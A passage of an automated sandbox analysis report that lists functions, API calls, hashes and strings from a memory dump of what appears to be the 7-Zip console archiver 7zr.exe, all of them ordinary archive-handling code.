                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: b062f76461d2ef164820adec38e0da73f2ce2def3523f045880b14396b4b06c4
                                              • Instruction ID: dd5dafaf5b57bce64937f40db71dca1c6336b1718a0716f9a456d43750a5a60b
                                              • Opcode Fuzzy Hash: b062f76461d2ef164820adec38e0da73f2ce2def3523f045880b14396b4b06c4
                                              • Instruction Fuzzy Hash: F7D01231118722868AA45F3CBC459D233E85A12334361175AF0B0D72F1D3608C834654
                                              Function 00D76B23 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000), ref: 00D76B31
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 773f6a706f5f1912caa3b1ef44c5a8569c315fa44b5fd9096cc06201194c5b5f
                                              • Instruction ID: ed7d77de3889508246ff386c9f129f08a361f6b6718b8969e719434412dfb4c6
                                              • Opcode Fuzzy Hash: 773f6a706f5f1912caa3b1ef44c5a8569c315fa44b5fd9096cc06201194c5b5f
                                              • Instruction Fuzzy Hash: EAC08CE1A4D280DFDF0213508C407603B208B83300F0A10C2E4089B092C2041808C732
                                              Function 00D769D0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: malloc
                                              • String ID:
                                              • API String ID: 2803490479-0
                                              • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                              • Instruction ID: 949c80e23121896baf84572a3c1ff10cf1a851a46c341be522fcec045f0a9cf9
                                              • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                              • Instruction Fuzzy Hash: 2BA024C551104001DD1C33303C014173000D3503077C444FC7705C0101F715C1041035
                                              Function 00D76AF0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: malloc
                                              • String ID:
                                              • API String ID: 2803490479-0
                                              • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                              • Instruction ID: 2f5990b04c38058ac3124e26a7cd61951e5d141c013d2d2ee81922acd8f422ab
                                              • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                              • Instruction Fuzzy Hash: E8A022CCF0020002EE0832383C028A32023F3F0B0ABECC8B8B8088020AFF28C0083033
                                              Function 00D76BA3 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00D76BAC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 12d2ea052e6ee49cd8de6e02b69f212a2bc425a167dfb1f57ed3bea5e3fbc1ba
                                              • Instruction ID: 531c73cde48ab289caacba34a8b4bf8c3277b32a1cf0002a8ebe08f2e8b05079
                                              • Opcode Fuzzy Hash: 12d2ea052e6ee49cd8de6e02b69f212a2bc425a167dfb1f57ed3bea5e3fbc1ba
                                              • Instruction Fuzzy Hash: 37A02238280300B3EC2023302C0FF0833203380F00F3080003200A80C00AE030008A2C
                                              Function 00D769F0 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                              • Instruction ID: d0b173abeb8222350892d09cf8f5796c552bafb83d9ed52b39ab2dc7b1d049fc
                                              • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                              • Instruction Fuzzy Hash:
                                              Function 00D76B10 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                              • Instruction ID: a085da1754123b30d81b3b31d5ecf4dadd1a5f84dda8b7be68737ece6f461427
                                              • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                              • Instruction Fuzzy Hash:
                                              Function 00CF1E40 Relevance: 1.3, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 2776204276de3807dac7050951fe374351e97eab27ae8cca13194db67bce0e4a
                                              • Instruction ID: df62086e98ab901d2c64ae6f46cbd0e39f9c3c21aa33f236cd1d3fde4665ceb2
                                              • Opcode Fuzzy Hash: 2776204276de3807dac7050951fe374351e97eab27ae8cca13194db67bce0e4a
                                              • Instruction Fuzzy Hash: 31A00271515301DBDA051B10EE094897B61EB85627B21545BF057A05718B314860BA15

                                              Non-executed Functions

                                              Function 00D90090 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: Version
                                              • String ID:
                                              • API String ID: 1889659487-0
                                              • Opcode ID: c6439fcb35b63e539141302dec65a58c93f15d5bc50d1685ed8f10e0633cc778
                                              • Instruction ID: 581c223af487bc8246ed4969afeb93cc13e8df6f6ab1471214ca47ac74aa6aa4
                                              • Opcode Fuzzy Hash: c6439fcb35b63e539141302dec65a58c93f15d5bc50d1685ed8f10e0633cc778
                                              • Instruction Fuzzy Hash: 05D05B729214154FDF00772CD8063597BA5F760300FCC4954D869C1153F97DC655C2F2
                                              Function 00CFC085 Relevance: 21.5, APIs: 17, Instructions: 290COMMON
                                              Download Yara Rule
                                              APIs
                                              • memcmp.MSVCRT(?,00DA48A0,00000010), ref: 00CFC09E
                                              • memcmp.MSVCRT(?,00DA0258,00000010), ref: 00CFC0BB
                                              • memcmp.MSVCRT(?,00DA0348,00000010), ref: 00CFC0CE
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: 55efa8b5fd700e3d2afd3f566e5718171bc429d4fe78c8d75c0731e9d4adb39b
                                              • Instruction ID: 65f0b736cf257830c8a1fcf49f86f22a2fd469591b0baa188e0284ecc621b6e1
                                              • Opcode Fuzzy Hash: 55efa8b5fd700e3d2afd3f566e5718171bc429d4fe78c8d75c0731e9d4adb39b
                                              • Instruction Fuzzy Hash: F791637174071DABD7A49A22DD81FBB37A8EF65750F008428FE5AD7101F720AE18C7A2
                                              Function 00D5447A Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 291COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                                              • API String ID: 3519838083-1909666238
                                              • Opcode ID: fabadec87268c111cad1a6ef5a39ffce00390231aec1c88ef42272ad7bf41173
                                              • Instruction ID: 56641789853d74b039104583424cb59311f853ecadc4f3aba53a7907216470b4
                                              • Opcode Fuzzy Hash: fabadec87268c111cad1a6ef5a39ffce00390231aec1c88ef42272ad7bf41173
                                              • Instruction Fuzzy Hash: 28C1AE31904289AFCF14DB64C451AFD7F61EF0230AF1980A9EC895B162DB309E8DDB62
                                              Function 00CF64F3 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF64F8
                                              • GetCurrentThreadId.KERNEL32 ref: 00CF6508
                                              • GetTickCount.KERNEL32 ref: 00CF6513
                                              • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00CF651E
                                              • GetTickCount.KERNEL32 ref: 00CF6578
                                              • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 00CF65C5
                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00CF65EC
                                                • Part of subcall function 00CF5D7A: __EH_prolog.LIBCMT ref: 00CF5D7F
                                                • Part of subcall function 00CF5D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00CF5DA1
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                                              • String ID: .tmp$d
                                              • API String ID: 1989517917-2797371523
                                              • Opcode ID: 06357d32dae191a743b3e397f653e35d4e7f3d5ab8cc81e4d006f9b23a931e77
                                              • Instruction ID: 3f4d53e173f3df183a653ad091a3a91ffb62a6460a36072f7e394b86e675c67d
                                              • Opcode Fuzzy Hash: 06357d32dae191a743b3e397f653e35d4e7f3d5ab8cc81e4d006f9b23a931e77
                                              • Instruction Fuzzy Hash: C041D03291022C9BDF55ABA0D8557FD7B71FF55354F14012AEA12F72A1CB358900DB23
                                              Function 00D26244 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prologfputs
                                              • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                                              • API String ID: 1798449854-1259944392
                                              • Opcode ID: b39f240f136c3c96923560129b8c11c2ead8ea4b0bea09bc81a36033eaccfd49
                                              • Instruction ID: 53763d8f0c20dfafbb39b5d2553d38276fbc2500132ca719c74f4b976ce2a749
                                              • Opcode Fuzzy Hash: b39f240f136c3c96923560129b8c11c2ead8ea4b0bea09bc81a36033eaccfd49
                                              • Instruction Fuzzy Hash: 4021B032A00715DFCB04EB94D542ABEB3A5FF64314B04002AF642D73A2CB70ED069BA5
                                              Function 00CFA08C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CFA091
                                                • Part of subcall function 00CF9BAA: RegCloseKey.ADVAPI32(?,?,00CF9BA0), ref: 00CF9BB6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CloseH_prolog
                                              • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                                              • API String ID: 1579395594-270022386
                                              • Opcode ID: 247598ccad419dfd7687a2caf33365f123307e058df1b9a33d1de8af158b6a96
                                              • Instruction ID: 64b19bc3a0906f9e5bbbddac1b9a5f43c188379908392a3e37b3daa93934c0b5
                                              • Opcode Fuzzy Hash: 247598ccad419dfd7687a2caf33365f123307e058df1b9a33d1de8af158b6a96
                                              • Instruction Fuzzy Hash: 3D518771A00209DFCF54EF94C8919BEF7B5FF58340F51842DE615A7291DB70AA05CB62
                                              Function 00D503D6 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 212COMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 00D503F5
                                              • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 00D50490
                                              • memset.MSVCRT ref: 00D50618
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: memset$memcpy
                                              • String ID: $@
                                              • API String ID: 368790112-1077428164
                                              • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                                              • Instruction ID: 060d7b011c5a7f376f6dff6fcd6f484400913011050a14fcbf5d4de8f69bdb92
                                              • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                                              • Instruction Fuzzy Hash: C6919F31900309AFEF20DF24C841BDABBB1EF54315F048959ED9A56192DB70BA9DCFA0
                                              Function 00CF613C Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF6141
                                                • Part of subcall function 00CF6C72: __EH_prolog.LIBCMT ref: 00CF6C77
                                              • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 00CF6197
                                              • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00CF626E
                                              • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 00CF62A9
                                                • Part of subcall function 00CF6096: __EH_prolog.LIBCMT ref: 00CF609B
                                                • Part of subcall function 00CF6096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00CF60DF
                                              • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00CF6285
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ErrorLast$H_prolog$DeleteFile
                                              • String ID:
                                              • API String ID: 3586524497-0
                                              • Opcode ID: 3553a171365fc4a7ba85bb47d3d036884762ef64681c55432239d59d26382268
                                              • Instruction ID: 460c9e99fa5e2aab4e3069e139da77658a15a6ca264d6cb5df0c698bdebb58ca
                                              • Opcode Fuzzy Hash: 3553a171365fc4a7ba85bb47d3d036884762ef64681c55432239d59d26382268
                                              • Instruction Fuzzy Hash: B851CE31C0421CEADF95EBE4D855BFDBB74AF11350F10815AEA51731D2CB352A0AEB62
                                              Function 00D044C2 Relevance: 7.6, APIs: 6, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              • memcmp.MSVCRT(?,00DA48A0,00000010), ref: 00D044DB
                                              • memcmp.MSVCRT(?,00DA0128,00000010), ref: 00D044EE
                                              • memcmp.MSVCRT(?,00DA0228,00000010), ref: 00D0450B
                                              • memcmp.MSVCRT(?,00DA0248,00000010), ref: 00D04528
                                              • memcmp.MSVCRT(?,00DA01C8,00000010), ref: 00D04545
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: 168841dfa999a87597ea30b4fab2451fa912d6c04c16596a8b9421251f002a8d
                                              • Instruction ID: f0a76025eefc94034f0c65b610910323d2a2e5381be66a1b9bcc60887acdaef2
                                              • Opcode Fuzzy Hash: 168841dfa999a87597ea30b4fab2451fa912d6c04c16596a8b9421251f002a8d
                                              • Instruction Fuzzy Hash: BB21B0B27403086FE704AE219C86FBE37A8DB517A0B048038FE099A285F664DE0487B0
                                              Function 00D3C414 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: !$LZMA2:$LZMA:
                                              • API String ID: 3519838083-3332058968
                                              • Opcode ID: e74663020d64a72ae78e4fd8ca555da7e1564a8b278931a11a1fcdd99dedae85
                                              • Instruction ID: 53100001af70dff6fac6c2c4d29b88c7f08dc8713a09aa4a4a318b64b7546ae0
                                              • Opcode Fuzzy Hash: e74663020d64a72ae78e4fd8ca555da7e1564a8b278931a11a1fcdd99dedae85
                                              • Instruction Fuzzy Hash: 2C610231A2010AAEDF25CB64C84AFFD7BB1AF15340F1860A9E44677172CB70AE80CB61
                                              Function 00CFA384 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CFA389
                                                • Part of subcall function 00CFA4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,00CFA3C1,00000001), ref: 00CFA4CD
                                                • Part of subcall function 00CFA4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00CFA4DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AddressH_prologHandleModuleProc
                                              • String ID: : $ SP:$Windows
                                              • API String ID: 786088110-3655538264
                                              • Opcode ID: 87c965d2819866b9b9dff881d423a01ab4df8403da50ee2593f0c08a4dbce634
                                              • Instruction ID: b28fd0704fc73c3bcbe63102be12c57d82e72c85de47c6bb95d0c1443bc01b79
